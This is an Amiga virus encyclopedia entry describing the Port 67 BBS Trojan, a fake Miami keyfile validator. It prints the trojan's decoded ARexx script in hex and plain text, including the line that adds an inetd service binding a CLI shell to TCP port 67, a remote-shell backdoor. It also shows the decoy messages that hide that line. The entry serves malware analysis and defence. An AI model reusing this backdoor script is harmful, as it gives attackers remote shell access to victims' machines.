VIRUS HELP TEAM Amiga Antivirus Website www.vht-dk.dk
------------------------
Amiga Virus Encyclopedia
Port 67 BBS Trojan
------------------------
Name : Port 67 BBS Trojan
Aliases : No Aliases
Original : -
Type : Trojan
File name : mkey.exe
Size : 1890 bytes
File-ID : .--------------------------------------.
|So rumour has it Holger has released a|
|virus to harm users with fake miami |
|keyfiles. This will check your keys to|
|ensure its safe to use, dEN saves ya |
|and fists Holgers ass! |
`--------------------------------------'
}-- dEN 3/3/98 pHuKeRs --{
Symptoms : Encryption is the same as Port-1599 Trojan, on a
Byte to Byte level.
Discovered : -
Way to infect: writeln('script','ADD inetd day stream tcp dos bin Prt newcli tcp:67')
Rating : Harmless
Kickstarts : 1.2
1.3
2.0
3.0
Damage : Overwrites Bootblock
Visible text : -
Comments : This changes the Preferences of Miami. Every time Miami starts a Cli,
tied into TCP: Port 67, and not into CON:
The text refering to key1 an 2 is only a smokescreen.
HEX text : Uncoded in the file can be read:
01014e75 24564552 3a202d4d 69616d69 ..Nu$VER: -Miami
204b6579 2046696c 65205661 6c696461 Key File Valida
746f7220 76312e30 2d20a964 454e5e70 tor v1.0- .dEN^p
484b2069 6e203139 39380a00 HK in 1998..
Within mkey.exe is a multi-coded area.
In memory emerges:
00000070 2f2a202a 2f0a2020 20205361 ...p/* */. Sa
79202727 0a202020 20536179 20274d69 y ''. Say 'Mi
616d6920 4b657966 696c6520 56616c69 ami Keyfile Vali
6461746f 7220a96f 44654420 62792064 dator .oDeD by d
454e5e50 486b2031 39393827 0a202020 EN^PHk 1998'.
20536179 2027270a 20202020 53617920 Say ''. Say
27527566 662c2062 75742066 69727374 'Ruff, but first
20746f20 63686563 6b21270a 0a6f7065 to check!'..ope
6e282773 63726970 74272c27 456e7641 n('script','EnvA
72633a4d 69616d69 6368616e 67654442 rc:MiamichangeDB
272c2757 27290a77 72697465 6c6e2827 ','W').writeln('
73637269 7074272c 27414444 20696e65 script','ADD ine
74642064 61792073 74726561 6d207463 td day stream tc
7020646f 73206269 6e205072 74206e65 p dos bin Prt ne
77636c69 20746370 3a363727 290a636c wcli tcp:67').cl
6f736528 27736372 69707427 290a0a49 ose('script')..I
46204f50 454e2827 74686572 65272c27 F OPEN('there','
6d69616d 693a4d69 616d692e 6b657931 miami:Miami.key1
272c2752 27290a54 48454e20 63686563 ','R').THEN chec
6b322829 0a454c53 45205361 79202727 k2().ELSE Say ''
0a202020 20536179 20274b65 79203120 . Say 'Key 1
69732062 6164206f 72206e6f 6e206578 is bad or non ex
69737461 6e74270a 20202020 53617920 istant'. Say
27446964 20796f75 206d616b 65206120 'Did you make a
4d69616d 693a2061 73736967 6e20746f Miami: assign to
20796f75 72206b65 79733f27 0a202020 your keys?'.
20536179 2027270a 45786974 0a0a6368 Say ''.Exit..ch
65636b32 3a0a4946 204f5045 4e282774 eck2:.IF OPEN('t
68657265 32272c27 6d69616d 693a4d69 here2','miami:Mi
616d692e 6b657932 272c2752 27290a54 ami.key2','R').T
48454e20 646f6e65 28290a45 4c534520 HEN done().ELSE
53617920 27270a20 20202053 61792027 Say ''. Say '
4b657920 32206973 20626164 206f7220 Key 2 is bad or
6e6f6e20 65786973 74616e74 270a2020 non existant'.
20205361 79202742 65747465 7220676f Say 'Better go
20616e64 20676574 20736f6d 65746869 and get somethi
6e672062 65747465 7221270a 20202020 ng better!'.
53617920 27270a45 7869740a 0a646f6e Say ''.Exit..don
653a0a53 61792027 270a5361 7920272b e:.Say ''.Say '+
2d2d2d2d 2d2d2d2d 2d2d2d2d 2d2d2d2d ----------------
2d2d2d2d 2d2b270a 53617920 277c3d2d -----+'.Say '|=-
3d2d4b65 79732061 72652066 696e652d =-Keys are fine-
3d2d3d7c 270a5361 7920272b 2d2d2d2d =-=|'.Say '+----
2d2d2d2d 2d2d2d2d 2d2d2d2d 2d2d2d2d ----------------
2d2b270a 65786974 0a0a7265 7475726e -+'.exit..return
20310000 1..
Antivirus : Kickstart 1.2 & 1.3..... : VT-Schutz
Kickstart 2.0 and higher : VirusZ III, with the new Xvs.library installed
Test made by : Heiner Schneegold
